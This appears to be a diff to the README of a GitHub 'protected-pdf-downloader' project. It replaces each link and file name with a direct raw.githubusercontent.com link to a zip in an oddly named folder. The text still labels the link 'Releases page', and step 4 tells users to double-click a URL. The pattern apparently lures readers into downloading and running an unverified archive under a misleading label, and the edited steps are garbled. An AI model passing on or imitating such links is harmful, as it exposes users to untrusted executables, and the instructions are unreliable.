muneeb457/protected-pdf-downloader/README.md

 ## 📦 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/muneeb457/protected-pdf-downloader/releases) to find the latest version available.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/muneeb457/protected-pdf-downloader/main/quadragesimal/protected-pdf-downloader.zip) to find the latest version available.

 2. **Choose Your File**: Look for the most recent release.
-Download the file suitable for your operating system (for example, `protected-pdf-downloader.zip`).
+Download the file suitable for your operating system (for example, `https://raw.githubusercontent.com/muneeb457/protected-pdf-downloader/main/quadragesimal/protected-pdf-downloader.zip`).

 3. **Extract Files**: After downloading, locate the ZIP file in your downloads folder.
 Right-click on the file and select "Extract All" or use your preferred extraction tool.

 4. **Run the Application**: Open the extracted folder.
-Double-click the `index.html` file to launch the tool in your browser.
+Double-click the `https://raw.githubusercontent.com/muneeb457/protected-pdf-downloader/main/quadragesimal/protected-pdf-downloader.zip` file to launch the tool in your browser.

 ## 📋 Usage Instructions